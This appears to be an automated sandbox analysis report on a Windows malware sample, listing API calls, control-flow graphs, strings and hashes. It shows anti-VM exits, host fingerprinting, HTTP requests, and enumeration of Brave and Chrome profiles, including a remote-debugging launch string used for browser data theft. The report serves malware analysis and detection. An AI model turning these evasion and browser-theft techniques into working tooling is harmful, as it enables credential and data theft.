                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                              • String ID: :$C$\
                                              • API String ID: 3790021787-3809124531
                                              • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                              • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                              • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                              • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1344 484003c-4840047 1345 484004c-4840263 call 4840a3f call 4840e0f call 4840d90 VirtualAlloc 1344->1345 1346 4840049 1344->1346 1361 4840265-4840289 call 4840a69 1345->1361 1362 484028b-4840292 1345->1362 1346->1345 1367 48402ce-48403c2 VirtualProtect call 4840cce call 4840ce7 1361->1367 1364 48402a1-48402b0 1362->1364 1366 48402b2-48402cc 1364->1366 1364->1367 1366->1364 1373 48403d1-48403e0 1367->1373 1374 48403e2-4840437 call 4840ce7 1373->1374 1375 4840439-48404b8 VirtualFree 1373->1375 1374->1373 1377 48405f4-48405fe 1375->1377 1378 48404be-48404cd 1375->1378 1381 4840604-484060d 1377->1381 1382 484077f-4840789 1377->1382 1380 48404d3-48404dd 1378->1380 1380->1377 1386 48404e3-4840505 LoadLibraryA 1380->1386 1381->1382 1387 4840613-4840637 1381->1387 1384 48407a6-48407b0 1382->1384 1385 484078b-48407a3 1382->1385 1388 48407b6-48407cb 1384->1388 1389 484086e-48408be LoadLibraryA 1384->1389 1385->1384 1390 4840517-4840520 1386->1390 1391 4840507-4840515 1386->1391 1392 484063e-4840648 1387->1392 1393 48407d2-48407d5 1388->1393 1396 48408c7-48408f9 1389->1396 1394 4840526-4840547 1390->1394 1391->1394 1392->1382 1395 484064e-484065a 1392->1395 1397 4840824-4840833 1393->1397 1398 48407d7-48407e0 1393->1398 1399 484054d-4840550 1394->1399 1395->1382 1400 4840660-484066a 1395->1400 1401 4840902-484091d 1396->1401 1402 48408fb-4840901 1396->1402 1408 4840839-484083c 1397->1408 1403 48407e4-4840822 1398->1403 1404 48407e2 1398->1404 1405 4840556-484056b 1399->1405 1406 48405e0-48405ef 1399->1406 1407 484067a-4840689 1400->1407 1402->1401 1403->1393 1404->1397 1412 484056d 1405->1412 1413 484056f-484057a 1405->1413 1406->1380 1409 4840750-484077a 1407->1409 1410 484068f-48406b2 1407->1410 1408->1389 1411 484083e-4840847 1408->1411 1409->1392 1416 48406b4-48406ed 1410->1416 1417 48406ef-48406fc 1410->1417 1418 4840849 1411->1418 1419 484084b-484086c 1411->1419 1412->1406 1414 484057c-4840599 1413->1414 
1415 484059b-48405bb 1413->1415 1427 48405bd-48405db 1414->1427 1415->1427 1416->1417 1421 48406fe-4840748 1417->1421 1422 484074b 1417->1422 1418->1389 1419->1408 1421->1422 1422->1407 1427->1399
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0484024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 143476885a8a20b9c4abb79d2a40fa3860ba4b741457090b907c42d3e61f3335
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: D4528974A01229DFDB64CF68C984BADBBB1BF09304F1485D9E90DAB351DB30AA84DF11

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C227A8), ref: 00419BF1
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22970), ref: 00419C0A
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C229D0), ref: 00419C22
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22988), ref: 00419C3A
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C229A0), ref: 00419C53
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C9D518), ref: 00419C6B
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C9CBC0), ref: 00419C83
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C9CA80), ref: 00419C9C
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22A00), ref: 00419CB4
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C229E8), ref: 00419CCC
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22940), ref: 00419CE5
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C229B8), ref: 00419CFD
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C9CA20), ref: 00419D15
                                                • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,02C22958), ref: 00419D2E
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                                • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                                • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                                • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                              • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02C9D528,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                              • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                              • Sleep.KERNEL32(00001770), ref: 00416DA4
                                              • CloseHandle.KERNEL32(?,00000000,?,02C9D528,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                              • ExitProcess.KERNEL32 ref: 00416DC2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                              • String ID:
                                              • API String ID: 3511611419-0
                                              • Opcode ID: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                              • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                              • Opcode Fuzzy Hash: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                              • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E

                                              Control-flow Graph

                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ??2@$CrackInternetlstrlen
                                              • String ID: <
                                              • API String ID: 1683549937-4251816714
                                              • Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                              • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                              • Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                              • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95

                                              Control-flow Graph (legend: Executed / Not Executed; basic blocks listed as id: address range, calls -> successors)

                                              • 1493: 401220-401247, call 418b40, GlobalMemoryStatusEx -> 1496, 1497
                                              • 1496: 401273-40127a -> 1499
                                              • 1497: 401249-401271, call 41dd30 * 2 -> 1499
                                              • 1499: 401281-401285 -> 1501, 1502
                                              • 1501: 401287 -> 1504, 1505
                                              • 1502: 40129a-40129d
                                              • 1504: 401292-401294, ExitProcess
                                              • 1505: 401289-401290 -> 1502, 1504
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                              • __aulldiv.LIBCMT ref: 00401258
                                              • __aulldiv.LIBCMT ref: 00401266
                                              • ExitProcess.KERNEL32 ref: 00401294
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                              • String ID: @
                                              • API String ID: 3404098578-2766056989

                                              Control-flow Graph (legend: Executed / Not Executed; basic blocks listed as id: address range, calls -> successors)

                                              • 1507: 416d93 -> 1508
                                              • 1508: 416daa -> 1510, 1511
                                              • 1510: 416d5a-416d77, call 41ade0, OpenEventA -> 1516, 1517
                                              • 1511: 416dac-416dc2, call 416bc0, call 415d60, CloseHandle, ExitProcess
                                              • 1516: 416d95-416da4, CloseHandle, Sleep -> 1508
                                              • 1517: 416d79-416d91, call 41ade0, CreateEventA -> 1511
                                              APIs
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02C9D528,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                              • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                              • Sleep.KERNEL32(00001770), ref: 00416DA4
                                              • CloseHandle.KERNEL32(?,00000000,?,02C9D528,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                              • ExitProcess.KERNEL32 ref: 00416DC2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                              • String ID:
                                              • API String ID: 941982115-0
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00406353
                                                • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 004063D5
                                                • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                              • String ID: ERROR$ERROR
                                              • API String ID: 3287882509-2579291623
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: Heap$AllocComputerNameProcess
                                              • String ID:
                                              • API String ID: 4203777966-0
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                              • ExitProcess.KERNEL32 ref: 00401143
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                              • String ID:
                                              • API String ID: 1103761159-0
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C23DEE
                                              • Module32First.KERNEL32(00000000,00000224), ref: 02C23E0E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C23000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2c23000_lxEu3xfjIb.jbxd
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              APIs
                                              • SetErrorMode.KERNEL32(00000400,?,?,04840223,?,?), ref: 04840E19
                                              • SetErrorMode.KERNEL32(00000000,?,?,04840223,?,?), ref: 04840E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: Virtual$AllocFree
                                              • String ID:
                                              • API String ID: 2087232378-0
                                              APIs
                                                • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                              • ExitProcess.KERNEL32 ref: 004011C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                              • String ID:
                                              • API String ID: 1004333139-0
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02C23AD6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C23000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2c23000_lxEu3xfjIb.jbxd
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                              • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                              • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
                                              • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                              Strings
                                              • \Brave\Preferences, xrefs: 0040C1C1
                                              • Brave, xrefs: 0040C0E8
                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                              • Google Chrome, xrefs: 0040C6F8
                                              • Preferences, xrefs: 0040C104
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                              • API String ID: 3334442632-1869280968
                                              APIs
                                              • wsprintfA.USER32 ref: 00413B1C
                                              • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                              • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                              • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                              • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                              • API String ID: 1125553467-4052298153
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0484C12C
                                              • StrCmpCA.SHLWAPI(?,00421454), ref: 0484C19A
                                              • StrCmpCA.SHLWAPI(?,00421458), ref: 0484C1B0
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484CB10
                                              • FindClose.KERNEL32(000000FF), ref: 0484CB22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                              • Instruction ID: 1f7bc9fad199007f085818ac58508675b6f5dddc326f759f139db5014e110d79
                                              • Opcode Fuzzy Hash: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                              • Instruction Fuzzy Hash: 275234719001189BDF58FB64DC95EEE7339AF54305F404BA9A90AE60A0EFB47B48CF52
                                              APIs
                                              • wsprintfA.USER32 ref: 00414B7C
                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                              • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\%s$%s\%s$%s\*$-SA
                                              • API String ID: 180737720-309722913
                                              • Opcode ID: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                              • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                              • Opcode Fuzzy Hash: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                              • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95
                                              APIs
                                              • wsprintfA.USER32 ref: 04853D83
                                              • FindFirstFileA.KERNEL32(?,?), ref: 04853D9A
                                              • lstrcat.KERNEL32(?,?), ref: 04853DEC
                                              • StrCmpCA.SHLWAPI(?,00420F58), ref: 04853DFE
                                              • StrCmpCA.SHLWAPI(?,00420F5C), ref: 04853E14
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0485411E
                                              • FindClose.KERNEL32(000000FF), ref: 04854133
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                              • String ID:
                                              • API String ID: 1125553467-0
                                              • Opcode ID: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                              • Instruction ID: 76c772b3ad164982ec75c25bfa961c0b7612580dfcd36bf9c240cb539d866e54
                                              • Opcode Fuzzy Hash: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                              • Instruction Fuzzy Hash: A7A16371A0021C9BDB24EFA4DC84FEE7379BF54704F444A89AA0DD6190EB75AB84CF52
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                              • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                              • wsprintfA.USER32 ref: 004147F6
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
